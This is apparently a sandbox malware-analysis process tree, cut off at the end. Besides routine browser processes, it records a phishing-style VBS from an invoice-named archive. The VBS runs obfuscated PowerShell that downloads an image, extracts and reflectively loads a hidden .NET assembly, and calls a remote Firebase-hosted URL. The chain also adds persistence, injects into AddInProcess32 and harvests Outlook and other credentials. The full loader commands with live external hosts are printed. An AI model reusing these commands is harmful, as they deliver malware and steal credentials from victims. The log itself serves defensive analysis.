  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4924 --field-trial-handle=1836,i,17774842143251342346,4921540910181807651,131072 /prefetch:1
  2⤵
  PID:3948
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5504 --field-trial-handle=1836,i,17774842143251342346,4921540910181807651,131072 /prefetch:8
  2⤵
  PID:3104
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4648 --field-trial-handle=1836,i,17774842143251342346,4921540910181807651,131072 /prefetch:8
  2⤵
  PID:4832
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=3768 --field-trial-handle=1836,i,17774842143251342346,4921540910181807651,131072 /prefetch:1
  2⤵
  PID:5104
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5564 --field-trial-handle=1836,i,17774842143251342346,4921540910181807651,131072 /prefetch:1
  2⤵
  PID:4116
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5172 --field-trial-handle=1836,i,17774842143251342346,4921540910181807651,131072 /prefetch:1
  2⤵
  PID:4596
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5724 --field-trial-handle=1836,i,17774842143251342346,4921540910181807651,131072 /prefetch:1
  2⤵
  PID:4916
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3840 --field-trial-handle=1836,i,17774842143251342346,4921540910181807651,131072 /prefetch:1
  2⤵
  PID:4948
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=992 --field-trial-handle=1836,i,17774842143251342346,4921540910181807651,131072 /prefetch:8
  2⤵
  PID:1508
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=932 --field-trial-handle=1836,i,17774842143251342346,4921540910181807651,131072 /prefetch:8
  2⤵
  PID:132
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=5728 --field-trial-handle=1836,i,17774842143251342346,4921540910181807651,131072 /prefetch:1
  2⤵
  PID:2772
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5188 --field-trial-handle=1836,i,17774842143251342346,4921540910181807651,131072 /prefetch:8
  2⤵
  PID:3288
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1720 --field-trial-handle=1836,i,17774842143251342346,4921540910181807651,131072 /prefetch:8
  2⤵
  PID:652
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1016 --field-trial-handle=1836,i,17774842143251342346,4921540910181807651,131072 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2796

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:948

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3560

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_Facture23122023.zip\Facture23122023.vbs"
1⤵
- Blocklisted process makes network request
PID:2760
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'JDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVQByDgTreGwDgTreIDgTreDgTre9DgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredwBhDgTreGwDgTrebDgTreBwDgTreGEDgTrecDgTreBlDgTreHIDgTreYwBhDgTreHYDgTreZQDgTreuDgTreGMDgTrebwBtDgTreC8DgTredQB3DgTreHDgTreDgTreLwB1DgTreHcDgTrecDgTreDgTre0DgTreDIDgTreMDgTreDgTrezDgTreDkDgTreOQDgTre0DgTreC4DgTrecDgTreBuDgTreGcDgTreJwDgTre7DgTreCQDgTredwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreTgBlDgTreHcDgTreLQBPDgTreGIDgTreagBlDgTreGMDgTredDgTreDgTregDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreTgBlDgTreHQDgTreLgBXDgTreGUDgTreYgBDDgTreGwDgTreaQBlDgTreG4DgTredDgTreDgTre7DgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBVDgTreHIDgTrebDgTreDgTrepDgTreDsDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEUDgTrebgBjDgTreG8DgTreZDgTreBpDgTreG4DgTreZwBdDgTreDoDgTreOgBVDgTreFQDgTreRgDgTre4DgTreC4DgTreRwBlDgTreHQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBFDgTreE4DgTreRDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreGcDgTreZQDgTregDgTreDDgTreDgTreIDgTreDgTretDgTreGEDgTrebgBkDgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreGcDgTredDgTreDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTre7DgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreCsDgTrePQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBTDgTreHUDgTreYgBzDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTresDgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTrepDgTreDsDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreQwBvDgTreG4DgTredgBlDgTreHIDgTredDgTreBdDgTreDoDgTreOgBGDgTreHIDgTrebwBtDgTreEIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCkDgTreOwDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreCDgTreDgTrePQDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreC4DgTreRwBlDgTreHQDgTreVDgTreB5DgTreHDgTreDgTreZQDgTreoDgTreCcDgTreQQBzDgTreHDgTreDgTrebwBzDgTreGUDgTreLgBEDgTreHIDgTreYQB3DgTreGkDgTrebgBnDgTreFMDgTrecDgTreBlDgTreGMDgTreLgBQDgTreGsDgTreaQBrDgTreEEDgTredDgTreB0DgTreHIDgTreQwBlDgTreHIDgTredDgTreBODgTreEIDgTreJwDgTrepDgTreDsDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTreUgB1DgTreG4DgTreJwDgTrepDgTreC4DgTreSQBuDgTreHYDgTrebwBrDgTreGUDgTreKDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreLDgTreDgTregDgTreFsDgTrebwBiDgTreGoDgTreZQBjDgTreHQDgTreWwBdDgTreF0DgTreIDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreGYDgTreaQByDgTreGUDgTreYgBhDgTreHMDgTreZQBzDgTreHQDgTrebwByDgTreGEDgTreZwBlDgTreC4DgTreZwBvDgTreG8DgTreZwBsDgTreGUDgTreYQBwDgTreGkDgTrecwDgTreuDgTreGMDgTrebwBtDgTreC8DgTredgDgTrewDgTreC8DgTreYgDgTrevDgTreGMDgTrebQBkDgTreGgDgTrebwBzDgTreHQDgTreLQBmDgTreGMDgTreNgBlDgTreGUDgTreLgBhDgTreHDgTreDgTrecDgTreBzDgTreHDgTreDgTrebwB0DgTreC4DgTreYwBvDgTreG0DgTreLwBvDgTreC8DgTreUgBlDgTreG0DgTreUwBlDgTreG4DgTreZDgTreDgTreuDgTreHQDgTreeDgTreB0DgTreD8DgTreYQBsDgTreHQDgTrePQBtDgTreGUDgTreZDgTreBpDgTreGEDgTreJgB0DgTreG8DgTreawBlDgTreG4DgTrePQDgTre4DgTreDQDgTreYQDgTre5DgTreGQDgTreMDgTreBlDgTreDkDgTreLQBkDgTreDUDgTreODgTreDgTre1DgTreC0DgTreNDgTreDgTre5DgTreDgDgTreNQDgTretDgTreDkDgTreZDgTreDgTrewDgTreDEDgTreLQDgTre3DgTreDUDgTreMgBmDgTreDcDgTreMQDgTrezDgTreGQDgTreZDgTreDgTreyDgTreGYDgTreMQDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreMgDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreVgBiDgTreHMDgTreTgBhDgTreG0DgTreZQDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreMQDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreQwDgTre6DgTreFwDgTreUDgTreByDgTreG8DgTreZwByDgTreGEDgTrebQBEDgTreGEDgTredDgTreBhDgTreFwDgTreJwDgTresDgTreCDgTreDgTreJwBMDgTreG4DgTreawBODgTreGEDgTrebQBlDgTreCcDgTreLDgTreDgTrenDgTreEEDgTreZDgTreBkDgTreEkDgTrebgBQDgTreHIDgTrebwBjDgTreGUDgTrecwBzDgTreDMDgTreMgDgTrenDgTreCwDgTreJwBkDgTreGUDgTrecwBhDgTreHQDgTreaQB2DgTreGEDgTreZDgTreBvDgTreCcDgTreLDgTreDgTrenDgTreGQDgTreZQBzDgTreGEDgTredDgTreBpDgTreHYDgTreYQBkDgTreG8DgTreJwDgTresDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCkDgTreKQDgTre=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4516
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "$imageUrl = 'https://wallpapercave.com/uwp/uwp4203994.png';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Aspose.DrawingSpec.PkikAttrCertNB');$method = $type.GetMethod('Run').Invoke($null, [object[]] ('https://firebasestorage.googleapis.com/v0/b/cmdhost-fc6ee.appspot.com/o/RemSend.txt?alt=media&token=84a9d0e9-d585-4985-9d01-752f713dd2f1' , 'desativado' , '2' , 'VbsName' , '1' , 'C:\ProgramData\', 'LnkName','AddInProcess32','desativado','desativado','desativado'))"
    3⤵
    - Blocklisted process makes network request
    - Adds Run key to start application
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    PID:228
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\VbsName.vbs
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5376
  - - C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe
      "C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe"
      4⤵
      Suspicious use of SetThreadContext
      Suspicious behavior: MapViewOfSection
      Suspicious use of SetWindowsHookEx
      PID:5696
    - - C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\regxgdimcsoavgzsinuua"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:6112
    - - C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\bymqhwtoyagngmvwayholwdn"
        5⤵
        
        PID:2468
    - - C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\msziigdhmiysitjajjbpnjywctz"
        5⤵
        
        PID:5284
    - - C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\msziigdhmiysitjajjbpnjywctz"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5304
    - - C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\bymqhwtoyagngmvwayholwdn"
        5⤵
        Accesses Microsoft Outlook accounts
        
        PID:5124
    - - C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\bymqhwtoyagngmvwayholwdn"
        5⤵
        
        PID:4464
    - - C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\bymqhwtoyagngmvwayholwdn"
        5⤵
        
        PID:6124
    - - C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\tdfdgytobvmdhoyoljpdzc"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1632
    - - C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\dglvgqehpdeirumsutbfchlnfg"
        5⤵
        
        PID:5372
    - - C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\dglvgqehpdeirumsutbfchlnfg"
        5⤵
        Accesses Microsoft Outlook accounts
        
        PID:3440
    - - C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\oaqozbpjllwntiieleognugegmgtf"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5768
    - - C:\Windows\SysWOW64\dxdiag.exe
        
        "C:\Windows\System32\dxdiag.exe" /t C:\Users\Admin\AppData\Local\Temp\sysinfo.txt
        5⤵
        Drops file in System32 directory
        Checks SCSI registry key(s)
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:3444

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\Temp1_SERVICE PUBLIC FÉDÉRAL FINANCES (1).zip\SERVICE PUBLIC FÉDÉRAL FINANCES.html
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff91d3d3cb8,0x7ff91d3d3cc8,0x7ff91d3d3cd8
  2⤵
  PID:3104
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1832,3319248541298693868,13401028789510698316,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1220
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1832,3319248541298693868,13401028789510698316,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1916 /prefetch:2
  2⤵
  PID:2060
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,3319248541298693868,13401028789510698316,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:1
  2⤵
  PID:2760
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,3319248541298693868,13401028789510698316,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3208 /prefetch:1
  2⤵
  PID:4916
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1832,3319248541298693868,13401028789510698316,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2728 /prefetch:8
  2⤵
  PID:2116
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1832,3319248541298693868,13401028789510698316,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5072 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5884
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,3319248541298693868,13401028789510698316,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5408 /prefetch:1
  2⤵
  PID:5424
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,3319248541298693868,13401028789510698316,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5280 /prefetch:1
  2⤵
  PID:5396
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,3319248541298693868,13401028789510698316,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:1
  2⤵
  PID:3576
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
